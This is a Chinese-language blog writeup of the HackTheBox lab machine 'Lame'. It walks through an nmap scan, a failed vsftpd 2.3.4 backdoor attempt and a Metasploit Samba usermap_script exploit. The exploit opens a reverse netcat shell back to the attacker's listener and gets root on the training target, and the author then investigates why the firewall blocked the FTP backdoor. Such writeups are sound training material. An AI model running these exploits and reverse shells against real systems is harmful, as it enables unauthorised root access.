HackTheBox-Machines Lame Writeup

kazma 成大資安社 創辦人/社長
  2024-08-11 11:34:23 2024-08-11 11:34:23 Created   2024-08-11 15:48 2024-08-11 15:48 Updated    

Brief Intro

由於最近身邊很多人在考證照都推薦事前準備可以先打 HackTheBox,所以從今天開始了 HTB 之旅。用 google 研究了一番找到傳說中的那個 OSCP 靶機清單 ,同時也發現 HTB 也有分一個網站是 academy,顧名思義就是以學習為主,另外一個主要都是放 lab,也是我們這次主要的目標。
那另外一點想分享的是,其實這次因為懶惰所以猶豫了一下才決定回來補 writeup,所以想把整理後的心態寫在這裡:

  1. 通常大家應該都分成兩種,同類型的題目要不都會寫 writeup 要不就都不寫,所以這裡就決定從一開始簡單的就要養成筆記的習慣。
  2. 筆記其實沒有想像中的麻煩,主要是紀錄關鍵步驟用到的指令或想法, exploit 順手丟上來保存而已,並不會花太多時間。
  3. 把筆記整理到部落格會讓我盡量把所有東西都弄懂,自己練習很容易遇到一知半解的東西就呼嚨過去了。
  4. 之後也會時常回來翻自己的筆記,畢竟自己的文字跟架構最熟悉,現在打 CTF 也是常常參考自己以前的筆記。

好那趕緊開始吧!

Exploitation

首先第一件事通常都會事先確定哪些服務有開,我們可以透過 nmap 這個指令來調查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
└──╼ [★]$ sudo nmap -sV 10.10.10.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 23:11 CDT
Nmap scan report for 10.10.10.3
Host is up (0.0029s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.24 seconds

可以看到 21, 22, 139, 445 這些 port 是有開的,而且透過 -sV 參數,我們可以看到服務的版本,而其中 vsftpd 2.3.4 是有漏洞存在的,可以透過 Metasploit 來扁他:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
└──╼ [★]$ msfconsole
Metasploit tip: When in a module, use back to go back to the top level 
prompt
                                                  

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search vsftpd 2.3.4

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

[msf](Jobs:0 Agents:0) >> use exploit/unix/ftp/vsftpd_234_backdoor 
[*] No payload configured, defaulting to cmd/unix/interact
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
                                       l
   RPORT    21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

看起來行不通,我們後面會解釋。
回去看其他可能的攻擊面是他有開 Samba 但是沒有顯示具體的版本號,我們一樣可以透過 Metasploit 來做這件事:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> search smb_version

Matching Modules
================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_version                   normal  No     SMB Version Detection


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version

[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> use 0
[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> show options 

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
                                       l
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> run

[*] 10.10.10.3:445        - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 10.10.10.3:445        -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 10.10.10.3:           - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

找到 Samba 3.0.20-Debian,那同樣這也是一個有漏洞的版本,一樣繼續用 Metasploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> search samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> show options 

Module options (exploit/multi/samba/usermap_script):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
                                       l
   RPORT    139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  94.237.79.118    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set lhost tun0
lhost => 10.10.14.22
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> run

[*] Started reverse TCP handler on 10.10.14.22:4444 
[*] Command shell session 1 opened (10.10.14.22:4444 -> 10.10.10.3:41231) at 2024-08-10 23:31:16 -0500

id
uid=0(root) gid=0(root)
find / -name 'user.txt' 2>/dev/null
/home/makis/user.txt
find / -name 'root.txt' 2>/dev/null
/root/root.txt

拿到 reverse shell 了,那同時因為直接取得了最高權限,所以我們已經拿到所有的 flag 不用再做提權了。

Discussion

那官方其實也有引導我們去做更深的討論,例如說:
Q: 為什麼剛剛 ftp 的後門會失敗?
A: 那因為我們已經拿下了機器的最高權限,所以其實我們可以看一下剛剛發生什麼事情,首先我們可以用一些小技巧讓 reverse shell 使用體驗更好,同時看一下目前機器在聽哪些位置:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
python -c 'import pty; pty.spawn("bash")'
root@lame:/# netstat -tnlp
netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      5448/xinetd     
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      5448/xinetd     
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      5448/xinetd     
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      5584/jsvc       
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      5643/unrealircd 
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      5171/mysqld     
tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      5625/rmiregistry
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      5643/unrealircd 
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      5425/smbd       
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      5646/Xtightvnc  
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      4626/portmap    
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      5646/Xtightvnc  
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      5604/apache2    
tcp        0      0 0.0.0.0:48433           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      5629/ruby       
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      5584/jsvc       
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      5448/xinetd     
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      5448/xinetd     
tcp        0      0 10.10.10.3:53           0.0.0.0:*               LISTEN      5024/named      
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      5024/named      
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      5448/xinetd     
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      5252/postgres   
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      5415/master     
tcp        0      0 0.0.0.0:50201           0.0.0.0:*               LISTEN      5347/rpc.mountd 
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      5024/named      
tcp        0      0 0.0.0.0:60955           0.0.0.0:*               LISTEN      4644/rpc.statd  
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      5425/smbd       
tcp        0      0 0.0.0.0:43838           0.0.0.0:*               LISTEN      5625/rmiregistry
tcp6       0      0 :::2121                 :::*                    LISTEN      5522/proftpd: (acce
tcp6       0      0 :::3632                 :::*                    LISTEN      5279/distccd    
tcp6       0      0 :::53                   :::*                    LISTEN      5024/named      
tcp6       0      0 :::22                   :::*                    LISTEN      5048/sshd       
tcp6       0      0 :::5432                 :::*                    LISTEN      5252/postgres   
tcp6       0      0 ::1:953                 :::*                    LISTEN      5024/named      
root@lame:/#

可以看到其實他在聽蠻多東西的,但掃的時候卻都沒看到,代表可能都被防火牆擋掉了,那我們看一下剛剛的 vsftpd 2.3.4 的 exploit 可以看到我們原本嘗試在 6200 port 開一個 reverse shell:

1
2
3
4
5
6
7
def get_shell(self):
    self.p.status("Connecting To Backdoor...")
    sleep(1)
    io = remote(self.ip, 6200)
    self.p.success("Got Shell!!!")
    io.interactive()
    io.close()

那我們可以檢查一下,現在確實沒有聽 6200,但我們送出攻擊腳本後,確實可以看到機器開始聽 6200,nc 上去也可以順利拿到 shell,這代表防火牆可能限制了對外的流量導致我們沒辦法成功拿 shell,所以到這邊大概就可以確定是防火牆的鍋。

Pwned !!!

lame

  • Title: HackTheBox-Machines Lame Writeup
  • Author: kazma
  • Created at : 2024-08-11 11:34:23
  • Updated at : 2024-08-11 15:00:48
  • Link: https://kazma.tw/2024/08/11/HackTheBox-Machines-Lame-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
HackTheBox-Machines Lame Writeup
  1. Brief Intro
  2. Exploitation
  3. Discussion